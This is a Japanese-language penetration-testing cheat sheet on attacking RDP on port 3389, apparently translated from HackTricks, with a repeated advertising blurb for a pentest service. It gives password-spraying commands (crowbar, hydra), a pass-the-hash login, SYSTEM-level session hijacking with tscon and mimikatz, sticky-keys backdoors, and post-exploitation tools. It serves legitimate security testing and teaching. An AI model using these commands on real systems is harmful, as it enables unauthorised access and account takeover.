3389 - Pentesting RDP

脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。

基本情報

Microsoftによって開発されたリモートデスクトッププロトコル（RDP）は、ネットワークを介してコンピュータ間のグラフィカルインターフェース接続を可能にするように設計されています。この接続を確立するために、ユーザーはRDPクライアントソフトウェアを利用し、同時にリモートコンピュータはRDPサーバーソフトウェアを操作する必要があります。このセットアップにより、遠隔コンピュータのデスクトップ環境をシームレスに制御およびアクセスでき、実質的にそのインターフェースをユーザーのローカルデバイスに持ち込むことができます。

デフォルトポート: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

列挙

自動

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

利用可能な暗号化とDoS脆弱性をチェックし（サービスにDoSを引き起こすことなく）、NTLM Windows情報（バージョン）を取得します。

ブルートフォース

注意してください、アカウントがロックされる可能性があります

パスワードスプレー

注意してください、アカウントがロックされる可能性があります

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

知っている資格情報/ハッシュで接続する

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

RDPサービスに対する既知の資格情報を確認する

impacketのrdp_check.pyを使用すると、いくつかの資格情報がRDPサービスに対して有効かどうかを確認できます：

rdp_check <domain>/<name>:<password>@<IP>

脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで。私たちはペンテスターを置き換えるのではなく、彼らに深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。

攻撃

セッションの盗難

SYSTEM権限を持つことで、所有者のパスワードを知る必要なく、任意のユーザーによって開かれたRDPセッションにアクセスできます。

開かれたセッションを取得:

query user

選択したセッションへのアクセス

tscon <ID> /dest:<SESSIONNAME>

今、選択したRDPセッションの中にいて、Windowsのツールと機能だけを使用してユーザーを偽装することができます。

重要: アクティブなRDPセッションにアクセスすると、そのセッションを使用していたユーザーが切断されます。

プロセスをダンプしてパスワードを取得することもできますが、この方法ははるかに速く、ユーザーの仮想デスクトップと対話することができます（ディスクに保存されていないノートパッドのパスワード、他のマシンで開かれた他のRDPセッション...）。

Mimikatz

これを行うためにmimikatzを使用することもできます:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

この技術をstickykeysまたはutilmanと組み合わせることで、いつでも管理者CMDおよび任意のRDPセッションにアクセスできるようになります。

これらの技術のいずれかでバックドアが仕掛けられたRDPを検索するには、https://github.com/linuz/Sticky-Keys-Slayerを使用できます。

RDPプロセスインジェクション

異なるドメインの誰か、またはより高い権限を持つユーザーがRDP経由であなたが管理者であるPCにログインした場合、彼のRDPセッションプロセスにあなたのビーコンをインジェクトして、彼のように行動することができます：

RDPグループへのユーザー追加

net localgroup "Remote Desktop Users" UserLoginName /add

Automatic Tools

• AutoRDPwn

AutoRDPwnは、主にMicrosoft Windowsコンピュータに対するShadow攻撃を自動化するために設計された、Powershellで作成されたポストエクスプロイトフレームワークです。この脆弱性（Microsoftによって機能としてリストされています）は、リモート攻撃者が被害者の同意なしにデスクトップを表示し、さらには要求に応じてそれを制御することを可能にします。これは、オペレーティングシステム自体にネイティブなツールを使用して行われます。

• EvilRDP

• コマンドラインから自動的にマウスとキーボードを制御

• コマンドラインから自動的にクリップボードを制御

• クライアントからSOCKSプロキシを生成し、RDPを介してターゲットへのネットワーク通信をチャネル

• ファイルをアップロードせずにターゲット上で任意のSHELLおよびPowerShellコマンドを実行

• ターゲットでファイル転送が無効になっている場合でも、ターゲットとの間でファイルをアップロードおよびダウンロード

HackTricks Automatic Commands

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。